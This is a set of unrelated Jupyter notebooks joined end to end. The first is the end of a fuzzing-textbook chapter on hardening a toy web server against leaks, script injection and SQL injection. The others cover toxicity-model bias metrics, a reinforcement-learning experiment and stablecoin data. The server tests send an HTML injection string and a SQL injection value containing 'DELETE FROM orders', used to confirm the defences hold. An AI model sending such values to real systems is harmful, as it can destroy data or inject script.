## Next Steps # # From here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces). # # If you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks. 
# + [markdown] slideshow={"slide_type": "slide"} # ## Background # # The [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities. # # The [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities. # # The [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more. # + [markdown] button=false new_sheet=true run_control={"read_only": false} slideshow={"slide_type": "slide"} # ## Exercises # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # ### Exercise 1: Fix the Server # # Create a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`: # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 1: Silent Failures # # Set up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes. 
# + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We define a better message that does not reveal tracebacks: # + slideshow={"slide_type": "skip"} solution2="hidden" BETTER_HTML_INTERNAL_SERVER_ERROR = \ HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "") # + slideshow={"slide_type": "skip"} solution2="hidden" HTML(BETTER_HTML_INTERNAL_SERVER_ERROR) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong: # + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(SimpleHTTPRequestHandler): def internal_server_error(self): # Note: No INTERNAL_SERVER_ERROR status self.send_response(HTTPStatus.OK, "Internal Error") self.send_header("Content-type", "text/html") self.end_headers() exc = traceback.format_exc() self.log_message("%s", exc.strip()) # No traceback or other information message = BETTER_HTML_INTERNAL_SERVER_ERROR self.wfile.write(message.encode("utf8")) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # #### Part 2: Sanitized HTML # # Set up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them. # + slideshow={"slide_type": "skip"} solution2="hidden" solution2_first=true import html # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters. 
# + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): def send_order_received(self, values): sanitized_values = {} for field in values: sanitized_values[field] = html.escape(values[field]) sanitized_values["item_name"] = html.escape( FUZZINGBOOK_SWAG[values["item"]]) confirmation = HTML_ORDER_RECEIVED.format( **sanitized_values).encode("utf8") self.send_response(HTTPStatus.OK, "Order received") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(confirmation) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 3: Sanitized SQL # # Set up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._ # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands. # + slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): def store_order(self, values): db = sqlite3.connect(ORDERS_DB) db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)", (values['item'], values['name'], values['email'], values['city'], values['zip'])) db.commit() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # One could also argue not to save "dangerous" characters in the first place. But then, there might always be names or addresses with special characters which all need to be handled. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 4: A Robust Server # # Set up the server such that it does not crash with invalid or missing fields. 
# + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form. # + cell_style="split" slideshow={"slide_type": "skip"} solution2="hidden" class BetterHTTPRequestHandler(BetterHTTPRequestHandler): REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip'] def handle_order(self): values = self.get_field_values() for required_field in self.REQUIRED_FIELDS: if required_field not in values: self.send_order_form() return self.store_order(values) self.send_order_received(values) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # #### Part 5: Test it! # # Test your improved server whether your measures have been successful. 
# + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # **Solution.** Here we go: # + slideshow={"slide_type": "skip"} solution2="hidden" httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler) # + slideshow={"slide_type": "skip"} solution2="hidden" print_url(httpd_url) # + slideshow={"slide_type": "skip"} solution2="hidden" print_httpd_messages() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test standard behavior: # + slideshow={"slide_type": "skip"} solution2="hidden" standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104" contents = webbrowser(httpd_url + standard_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Thank you") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for incomplete URLs: # + slideshow={"slide_type": "skip"} solution2="hidden" bad_order = "/order?item=" contents = webbrowser(httpd_url + bad_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Order Form") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for HTML (and JavaScript) injection: # + slideshow={"slide_type": "skip"} solution2="hidden" injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \ "&email=doe%40example.com&city=Seattle&zip=98104" contents = webbrowser(httpd_url + injection_order) HTML(contents) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("Thank you") > 0 assert contents.find("<script>") < 0 assert contents.find("&lt;script&gt;") > 0 # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # We test for SQL injection: # + slideshow={"slide_type": "skip"} solution2="hidden" sql_order = "/order?item=tshirt&name=" + \ cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \ "&email=doe%40example.com&city=Seattle&zip=98104" contents = 
webbrowser(httpd_url + sql_order) HTML(contents) # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # (Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...) # + slideshow={"slide_type": "skip"} solution2="hidden" assert contents.find("DELETE FROM") > 0 assert not orders_db_is_empty() # + [markdown] slideshow={"slide_type": "skip"} solution2="hidden" # That's it – we're done! # + slideshow={"slide_type": "skip"} solution2="hidden" httpd_process.terminate() # + slideshow={"slide_type": "skip"} solution2="hidden" if os.path.exists(ORDERS_DB): os.remove(ORDERS_DB) # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # ### Exercise 2: Protect the Server # # Assume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # #### Part 1: A Blacklisting Filter # # Set up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} solution="hidden" solution2="hidden" solution2_first=true solution_first=true # #### Part 2: A Whitelisting Filter # # Set up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose. 
# + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader. # + [markdown] slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # ### Exercise 3: Input Patterns # # To fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern # # ```html # <input type="text" pattern="[0-9][0-9][0-9][0-9][0-9]"> # ``` # # Extract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader at this point. # + [markdown] slideshow={"slide_type": "subslide"} solution2="hidden" solution2_first=true # ### Exercise 4: Coverage-Driven Web Fuzzing # # Combine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} solution="hidden" solution2="hidden" # **Solution.** Left to the reader at this point.
docs/beta/notebooks/WebFuzzer.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # + from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import pandas as pd import numpy as np import pkg_resources import matplotlib.pyplot as plt import seaborn as sns # %matplotlib inline import model_bias_analysis # autoreload makes it easier to interactively work on code in the model_bias_analysis module. # %load_ext autoreload # %autoreload 2 # + models = ['Rock:TOXICITY', 'RockV6_1:TOXICITY'] madlibs = pd.read_csv('eval_datasets/bias_madlibs_77k_scored_prod_models.csv') # Add columns for each subgroup. f = open('bias_madlibs_data/adjectives_people.txt', 'r') terms = [line.strip() for line in f] model_bias_analysis.add_subgroup_columns_from_text(madlibs, 'Text', terms) madlibs['label_bool'] = madlibs.apply(lambda row: row.Label == 'BAD', axis=1) # - def convert_to_boolean_labels(labels): return np.where(labels >= 0.5, True, False) # + human_labels = [ 'toxicity', 'severe_toxicity', 'obscene', 'sexual_explicit', 'identity_attack', 'insult', 'threat', 'male', 'female', 'transgender', 'other_gender', 'heterosexual', 'homosexual_gay_or_lesbian', 'bisexual', 'other_sexual_orientation', 'christian', 'jewish', 'muslim', 'hindu', 'buddhist', 'atheist', 'other_religion', 'black', 'white', 'asian', 'latino', 'other_race_or_ethnicity', 'physical_disability', 'intellectual_or_learning_disability', 'psychiatric_or_mental_illness', 'other_disability'] identities = [ 'male', 'female', 'transgender', 'heterosexual', 'homosexual_gay_or_lesbian', 'bisexual', 'christian', 'jewish', 'muslim', 'hindu', #'buddhist', 'atheist', 'other_religion', 'black', 'white', 'asian', 'latino', 'other_race_or_ethnicity', #'physical_disability', 'intellectual_or_learning_disability', 
    'psychiatric_or_mental_illness']

# +
real_data_models = ['rock_toxicity', 'rock_v6_1_toxicity']
real_data = pd.read_csv('eval_datasets/identity_labeled_scored.csv')
for human_label in human_labels:
    real_data[human_label] = convert_to_boolean_labels(real_data[human_label])

#Short data only
real_data = real_data[(real_data.comment_text.str.len() < 100)]
# -

madlibs_results = model_bias_analysis.compute_bias_metrics_for_models(madlibs, terms, models, 'label_bool')

real_data_results = model_bias_analysis.compute_bias_metrics_for_models(real_data, identities, real_data_models, 'toxicity')

# ### AUC Heatmap
# The heatmap below shows the three AUC-based metrics for two models. Each column is labeled with "MODEL\_NAME"_"METRIC\_NAME"
#
# Metrics:
# * <b>Subgroup AUC</b>: AUC of examples within the identity subgroup.
# * <b>Negative Cross AUC</b>: AUC of negative (out of class, i.e. non-toxic) examples in the identity subgroup, and positive examples outside the identity subgroup.
# * <b>Positive Cross AUC</b>: AUC of negative (out of class, i.e. non-toxic) examples outside the identity subgroup, and positive examples in the identity subgroup.
#
# Values should range between 0.5-1.0 and higher is better.
#

model_bias_analysis.plot_auc_heatmap(madlibs_results, models)

# ### AEG Heatmap
# The heatmap below shows the two Average Equality Gap metrics for two models.
#
# Metrics:
# * <b>Negative AEG</b>: Measures the difference between the distributions of out-of-class examples within the subgroup and outside the subgroup.
# * <b>Positive AEG</b>: Measures the difference between the distributions of in-class examples within the subgroup and outside the subgroup.
#
# 0 is the ideal for this metric. Positive values indicate a skew towards higher scores, negative values indicate a skew towards lower scores.
model_bias_analysis.plot_aeg_heatmap(madlibs_results, models) model_bias_analysis.plot_auc_heatmap(real_data_results, real_data_models) model_bias_analysis.plot_aeg_heatmap(real_data_results, real_data_models)
unintended_ml_bias/metric_heatmap_example.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: venv-MPSF
#     language: python
#     name: venv-mpsf
# ---

# +
import sys, os
sys.path.append('../')
from deep_rl import *
import matplotlib.pyplot as plt
import torch
from tqdm import trange, tqdm
import random
import numpy as np
# %load_ext autoreload
# %reload_ext autoreload
# %autoreload 2
# !mkdir log

# Grid-world layout selector; each layout has its own cell count and
# DQN training schedule.
layout = 'open'
if layout == '3rooms' or layout == '3roomsh':
    cell_num = 101
    max_step_dqn = 1e5
    linear_schedule_dqn = 6e4
elif layout == 'maze':
    cell_num = 75
    max_step_dqn = 1.5e5
    linear_schedule_dqn = 9e4
else:
    cell_num = 104
    max_step_dqn = 7e4
    linear_schedule_dqn = 4e4

# +
import pickle

def store_agent(obj, agent_name, layout=layout):
    """Pickle a network/agent object to '<agent_name>.p'.

    Fixed: use a context manager so the file handle is closed
    (the original passed a bare open() to pickle.dump).
    """
    print('storing network')
    with open(agent_name + '.p', 'wb') as fh:
        pickle.dump(obj, fh)

def load_agent(agent_name):
    """Unpickle and return the object stored at '<agent_name>.p'.

    Raises OSError (e.g. FileNotFoundError) if no such file exists;
    callers rely on that to fall back to training from scratch.
    """
    print('loading network')
    filename = agent_name + '.p'
    with open(filename, 'rb') as fh:
        return pickle.load(fh)
# -

# Stray debug cell kept for parity with the original notebook.
print(f'{[1, 1]}')

# +
import numpy as np
import torch
from tqdm import trange, tqdm
import sys
sys.path.append('../..')
from deep_rl.network import *

learning_rate_dqn = 2e-3  # from 0.05 - 0.001
# NOTE(review): these two assignments override the per-layout values set in
# the layout cell above for every layout — confirm this is intentional.
max_step_dqn = 1e5
linear_schedule_dqn = 6e4

def dqn_feature(config, **kwargs):
    """Configure, train (or load) and return a DQNAgent for `config.game`.

    If a pickled network exists under ./collector_agent/dqn/ it is loaded;
    otherwise the agent trains until config.max_steps and the network is
    stored there.
    """
    # A pre-defined config must be passed to the function.
    assert config is not None
    # generate_tag(kwargs)
    kwargs.setdefault('log_level', 0)
    config.merge(kwargs)
    config.task_fn = lambda: Task(config.game, default_w=config.default_w)
    config.eval_env = config.task_fn()

    # Fixed: narrowed the bare except (which also swallowed
    # KeyboardInterrupt) to the AttributeError raised for a missing attr.
    try:
        lr = config.lr
    except AttributeError:
        lr = 2e-3
    config.optimizer_fn = lambda params: torch.optim.RMSprop(params, lr)
    config.network_fn = lambda: DQNCNN(config.action_dim, SRIdentityBody(config.state_dim),
                                       hidden_units=(2000,))
    # config.network_fn = lambda: VanillaNet(config.action_dim, FCBody(config.state_dim, hidden_units=(16,)))
    config.replay_fn = lambda: AsyncReplay(memory_size=int(1e5), batch_size=10)
    config.random_action_prob = LinearSchedule(1.0, 0.1, config.linear_schedule)
    config.discount = 0.9
    config.target_network_update_freq = 200
    config.exploration_steps = 0
    # config.double_q = True
    config.double_q = False
    config.sgd_update_frequency = 4
    config.gradient_clip = 5
    config.eval_interval = int(5e3)
    config.async_actor = False
    agent = DQNAgent(config)

    # run_steps logic inlined below.
    config = agent.config
    agent_name = agent.__class__.__name__
    t0 = time.time()
    # plt.figure(figsize=(10,4))
    try:
        agent.network = load_agent(f'./collector_agent/dqn/layout:{config.game}-w:{config.default_w}')
    except Exception:
        while True:
            # print(agent.actor._task.env.envs[0].goal)
            if config.save_interval and not agent.total_steps % config.save_interval:
                agent.save('data/%s-%s-%d' % (agent_name, config.tag, agent.total_steps))
            if config.log_interval and not agent.total_steps % config.log_interval:
                t0 = time.time()
            if config.eval_interval and not agent.total_steps % config.eval_interval:
                agent.eval_episodes()
            if config.max_steps and agent.total_steps >= config.max_steps:
                store_agent(agent.network,
                            f'./collector_agent/dqn/layout:{config.game}-w:{config.default_w}')
                return agent
                # Fixed: removed the unreachable `break` that followed this return.
            agent.step()
            # plt.title('step: {}'.format(agent.total_steps), fontsize=20)
            # plt.imshow(agent.actor._task.env.envs[0].render(), cmap='Blues', )
            agent.switch_task()
    return agent
# -

config = Config()
config.DEVICE = torch.device('cpu')
config.game = 'FourRoomsCollect'
config.linear_schedule = 6e4
config.max_steps = 1e5
config.default_w = [1, 1]

# ### Experiment

# +
'''
1. First we train 3 different DQN's
'''
config = Config()
config.DEVICE = torch.device('cpu')
config.game = 'FourRoomsCollect'
config.linear_schedule = 4e4
config.max_steps = 7e4
config.default_w = [1, 1]
dqn0 = dqn_feature(config)

config = Config()
config.DEVICE = torch.device('cpu')
config.game = 'FourRoomsCollect'
config.linear_schedule = 7e4
config.max_steps = 1.5e5
config.default_w = [-1, 1]
dqn1 = dqn_feature(config)

config = Config()
config.DEVICE = torch.device('cpu')
config.game = 'FourRoomsCollect'
config.linear_schedule = 7e4
config.max_steps = 1.5e5
config.default_w = [1, 0]
dqn2 = dqn_feature(config)

# +
class SRNetCNN_MultiChannel(nn.Module):
    """Added by Surya. Successor-representation network with a CNN trunk.

    forward() returns (phi, psi, q): the state features, the per-action
    successor features, and the Q-values derived from them.
    """
    def __init__(self, output_dim, body, hidden_units=(3000,), gate=F.relu, config=0):
        """
        config -> type of learning on top of state abstraction
        0 - typical SR with weights sharing
        1 - learning SR without weights sharing
        """
        super(SRNetCNN_MultiChannel, self).__init__()
        self.body = body
        self.output_dim = output_dim
        self.width = 13
        # Interpret the flat feature vector as (init_channels, 13, 13) maps.
        self.init_channels = int(self.body.feature_dim / np.square(self.width))

        # CNN layers
        self.conv1 = nn.Conv2d(self.init_channels, 128, 3, 1)
        self.conv2 = nn.Conv2d(128, 256, 3, 1)
        # self.conv3 = nn.Conv2d(64, 128, 3, 1)

        # Flattened size after two valid 3x3 convs and one 2x2 max-pool.
        self.fc_size = 256 * ((self.width - (3 - 1) * 2) // 2) ** 2

        # FC layers mapping to one successor-feature vector per action.
        dims = (self.fc_size,) + hidden_units + (body.feature_dim * output_dim,)
        # print(self.fc_size, hidden_units, body.feature_dim, output_dim)
        # print(dims)
        self.layers = nn.ModuleList(
            [layer_init(nn.Linear(dim_in, dim_out))
             for dim_in, dim_out in zip(dims[:-1], dims[1:])])
        print(self.layers)
        self.gate = gate
        self.feature_dim = body.feature_dim * output_dim
        if (config == 0):
            self.psi2q = Psi2QNet(output_dim, body.feature_dim)
        if (config == 1):
            self.psi2q = Psi2QNetFC(output_dim, body.feature_dim)
        self.to(Config.DEVICE)

    def forward(self, x):
        phi = self.body(tensor(x))  # shape: b x state_dim
        psi = phi
        # Convert to image layout for the conv trunk.
        psi = psi.view(phi.size(0), self.init_channels, self.width, self.width)
        psi = F.relu(self.conv1(psi))
        psi = F.relu(self.conv2(psi))
        psi = F.max_pool2d(psi, 2)
        psi = torch.flatten(psi, 1)
        # FC layers (gate on all but the last).
        for layer in self.layers[:-1]:
            psi = self.gate(layer(psi))
        psi = self.layers[-1](psi)
        # shape: b x action_dim x state_dim
        psi = psi.view(psi.size(0), self.output_dim, self.body.feature_dim)
        out = self.psi2q(psi)
        return phi, psi, out

# +
max_step_avdsr = 5e5
linear_schedule_avdsr = 5e5
learning_rate_avdsr = 1e-3  # from 0.05 - 0.001

def avdsr_feature_A(**kwargs):
    """Train (or load) an avDSR agent averaging over the given DQN agents.

    Fixed: the original returned None when the pickled network loaded
    successfully (only the training branch returned the agent), which made
    the caller's `avdsr.loss_vec` access crash; now every path returns it.
    """
    kwargs['tag'] = 'Training avDSR based on DQN agents'
    generate_tag(kwargs)
    kwargs.setdefault('log_level', 0)
    config = Config()
    config.merge(kwargs)
    config.task_fn = lambda: Task(config.game)
    config.eval_env = config.task_fn()
    config.c = 1
    config.optimizer_fn = lambda params: torch.optim.RMSprop(params, learning_rate_avdsr)
    # config.network_fn = lambda: SRNet(config.action_dim, SRIdentityBody(config.state_dim),
    #                                   hidden_units=(), config=0)  # CHECK
    config.network_fn = lambda: SRNetCNN_MultiChannel(config.action_dim, SRIdentityBody(config.state_dim),
                                                      hidden_units=(3000,), config=config.style)  # CHECK
    config.replay_fn = lambda: Replay(memory_size=int(3e5), batch_size=10)
    config.random_action_prob = LinearSchedule(1, 1, linear_schedule_avdsr)  # CHECK
    config.discount = 0.99
    config.target_network_update_freq = 200
    config.exploration_steps = 0
    config.double_q = False
    config.sgd_update_frequency = 4
    config.gradient_clip = 5
    config.max_steps = max_step_avdsr
    config.async_actor = False
    agent = avDSRAgent(config, config.agents, style='DQN')

    # run_steps logic inlined below.
    config = agent.config
    agent_name = agent.__class__.__name__
    t0 = time.time()
    # agent.network = load_agent('avdsr-A')
    try:
        agent.network = load_agent(f'./collector_agent/avdsr/layout:{config.game}-w:{len(config.agents)}')
    except Exception:
        while True:
            if config.log_interval and not agent.total_steps % config.log_interval:
                agent.logger.info('steps %d, %.2f steps/s' % (
                    agent.total_steps, config.log_interval / (time.time() - t0)))
                t0 = time.time()
            if config.max_steps and agent.total_steps >= config.max_steps:
                store_agent(agent.network,
                            f'./collector_agent/avdsr/layout:{config.game}-w:{len(config.agents)}')
                return agent
                # Fixed: removed the unreachable `break` after this return.
            # import pdb; pdb.set_trace()
            agent.step()
            agent.switch_task()
    return agent
# -

# Fixed: the original called store_agent(avdsr.network, ...) BEFORE avdsr was
# defined (a NameError on a fresh Restart-&-Run-All); define first, store after.
avdsr = avdsr_feature_A(game='FourRoomsCollectNoTerm', agents=[dqn0, dqn1, dqn2], choice=0, style=0)

store_agent(avdsr.network, f'./collector_agent/avdsr/layout:FourRoomsCollectNoTerm-w:3')

# +
from deep_rl.component.fourrooms import *
from deep_rl.component.fourrooms_collect import *

g = [21, 28, 84, 91]
room1, room2, room3 = [], [], []
num = 0
agent_to_check = avdsr

# Per-layout cell-to-room assignment; `c` colors each cell by room for the
# PCA scatter below (doorway cells get negative sentinel colors).
if layout == '4rooms':
    num = 104
    c = np.ones(104) * 4
    room1 = list(range(5)) + list(range(10, 15)) + list(range(20, 25)) + list(range(31, 36)) + list(range(41, 46))
    room2 = list(range(5, 10)) + list(range(15, 20)) + list(range(26, 31)) + list(range(36, 41)) + list(range(46, 51)) + list(range(52, 57))
    room3 = list(range(57, 62)) + list(range(63, 68)) + list(range(73, 78)) + list(range(83, 88)) + list(range(94, 99))
    connect = [25, 51, 62, 88]
    c[room1] = 1
    c[room2] = 2
    c[room3] = 3
    c[connect] = [-1, -3, -5, -7]
elif layout == '3roomsh':
    num = 101
    c = np.ones(101) * 4
    room1 = list(range(0, 22))
    room2 = list(range(23, 67))
    room3 = list(range(68, 101))
    connect = [22, 67]
    c[room1] = 1
    c[room2] = 2
    c[room3] = 3
    c[connect] = [-1, -3]
elif layout == 'maze':
    num = 75
    c = np.ones(75) * 4
    room1 = list(range(12)) + [13, 22, 26, 33, 14, 23, 27, 34, 41, 48, 52, 61, 47, 51, 60, 63] + list(range(64, 75))
    room2 = list(range(15, 22)) + [24, 28, 35, 42, 49, 25, 32, 40, 46, 50] + list(range(53, 60))
    room3 = [29, 30, 31, 37, 38, 43, 44, 45]
    connect = [12, 62, 36, 39]
    c[room1] = 1
    c[room2] = 2
    c[room3] = 3
    c[connect] = [-1, -3, -5, -7]
elif layout == '3rooms':
    num = 101
    c = np.ones(101) * 4
    room1 = [0, 1, 2, 9, 10, 11, 83, 84, 85, 92, 93, 94] + list(range(19, 74, 9)) + list(range(20, 75, 9)) + list(range(21, 76, 9))
    room2 = [3, 4, 5, 12, 13, 14, 77, 78, 79, 86, 87, 88, 95, 96, 97] + list(range(22, 68, 9)) + list(range(23, 69, 9)) + list(range(24, 70, 9))
    room3 = [6, 7, 8, 80, 81, 82, 89, 90, 91, 98, 99, 100] + list(range(16, 71, 9)) + list(range(17, 72, 9)) + list(range(18, 73, 9))
    connect = [15, 76]
    c[room1] = 2
    c[room2] = 3
    c[room3] = 4
    c[connect] = [-1, -3]
elif layout == '3roomsm':
    num = 101
    c = np.ones(101) * 4
    room1 = [0, 1, 9, 10] + list(range(19, 74, 9)) + list(range(20, 75, 9)) + [83, 84, 92, 93]
    room2 = list(range(2, 6)) + list(range(11, 15)) + list(range(21, 67, 9)) + list(range(22, 68, 9)) + list(range(23, 69, 9)) + list(range(24, 70, 9)) + list(range(76, 80)) + list(range(85, 89)) + list(range(94, 98))
    room3 = [6, 7, 8] + list(range(16, 71, 9)) + list(range(17, 72, 9)) + list(range(18, 73, 9)) + [80, 81, 82, 89, 90, 91, 98, 99, 100]
    connect = [15, 75]
    c[room1] = 1
    c[room2] = 2
    c[room3] = 3
    c[connect] = [-1, -1]
elif layout == 'open':
    num = 121
    c = np.ones(121) * 4
    room1 = list(range(121))

print(len(room1), len(room2), len(room3))

# Collect the successor features for every cell by teleporting the agent.
env = ClctFourRooms(layout='open')
psi_all = np.zeros((num, 169 * 4 * 4))
for i in range(num):
    state = env.reset()
    env.agent_pos = i
    _, out, _ = agent_to_check.network(tensor(state).unsqueeze(0))
    psi = out.detach().cpu().numpy()
    psi_all[i, :] = psi.flatten()
psi_all.shape

from sklearn.decomposition import PCA

plt.figure(figsize=(6, 6), dpi=100)
pca = PCA(n_components=2)
k = pca.fit_transform(psi_all)
plt.scatter(k[:, 0], k[:, 1], c=c)
plt.xlabel('first principle component', fontsize=14)
plt.ylabel('second principle component', fontsize=14)
plt.colorbar()
plt.title('Principle components of SFs using PCA', fontsize=14)
# -

loss_lr_em3 = avdsr.loss_vec

kernel = 100
# Smoothed training-loss curve (skip the first 20 noisy points).
plt.plot(convolve(avdsr.loss_vec[20:], kernel))
plt.title('5e4 timesteps, smoothing=' + str(kernel))
plt.show()

# +
def dsr_feature_init(ref, **kwargs):
    """Train and return a DSRAgent, optionally warm-started from `ref`.

    If `ref` is not None its network weights are copied in (non-strict,
    so mismatched heads are skipped) before training.
    """
    generate_tag(kwargs)
    kwargs.setdefault('log_level', 0)
    config = Config()
    config.async_actor = False
    config.merge(kwargs)
    config.task_fn = lambda: Task(config.game)
    config.eval_env = config.task_fn()
    config.c = 1
    config.optimizer_fn = lambda params: torch.optim.RMSprop(params, 0.002)
    config.network_fn = lambda: SRNetCNN_MultiChannel(config.action_dim, SRIdentityBody(config.state_dim),
                                                      hidden_units=(3000,), config=config.style)  # CHECK
    config.replay_fn = lambda: AsyncReplay(memory_size=int(1e5), batch_size=10)
    config.random_action_prob = LinearSchedule(1.0, 0.1, linear_schedule_dqn)
    config.discount = 0.99
    config.target_network_update_freq = 200
    config.exploration_steps = 0
    # config.double_q = True
    config.double_q = False
    config.sgd_update_frequency = 4
    config.gradient_clip = 5
    config.eval_interval = int(5e3)
    config.max_steps = max_step_dqn
    config.async_actor = False
    agent = DSRAgent(config)

    # run_steps logic inlined below.
    config = agent.config
    agent_name = agent.__class__.__name__
    if (ref is not None):
        # strict=False: load what matches, ignore the rest.
        print(agent.network.load_state_dict(ref.network.state_dict(), strict=False))
    t0 = time.time()
    while True:
        if config.save_interval and not agent.total_steps % config.save_interval:
            agent.save('data/%s-%s-%d' % (agent_name, config.tag, agent.total_steps))
        if config.log_interval and not agent.total_steps % config.log_interval:
            # agent.logger.info('steps %d, %.2f steps/s' % (agent.total_steps, config.log_interval / (time.time() - t0)))
            t0 = time.time()
        if config.eval_interval and not agent.total_steps % config.eval_interval:
            agent.eval_episodes()
        if config.max_steps and agent.total_steps >= config.max_steps:
            return agent
            # Fixed: removed the unreachable `break` after this return.
        # import pdb; pdb.set_trace()
        agent.step()
        agent.switch_task()

dsr = dsr_feature_init(ref=avdsr, game='FourRoomsCollect', freeze=2, style=0)
notebooks/experiment.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: master_thesis
#     language: python
#     name: master_thesis
# ---

# # Stablecoin Billionaires<br> Descriptive Analysis of the Ethereum-based Stablecoin ecosystem
# ## by <NAME>, 01.07.2020
#
# Part IV - HUSD

# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import datetime
from collections import Counter
from matplotlib import rc
import re
import random

rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
rc('text', usetex=True)

# +
# plots (pre-aggregated CSVs)
tx_over_date = '../plots/husd/husd_txs_over_date.csv'
unique_senders_over_date = '../plots/husd/husd_unique_senders_over_date.csv'
unique_recipients_over_date = '../plots/husd/husd_unique_recipients_over_date.csv'
tx_count_to = '../plots/husd/husd_tx_count_to.csv'
tx_count_from = '../plots/husd/husd_tx_count_from.csv'
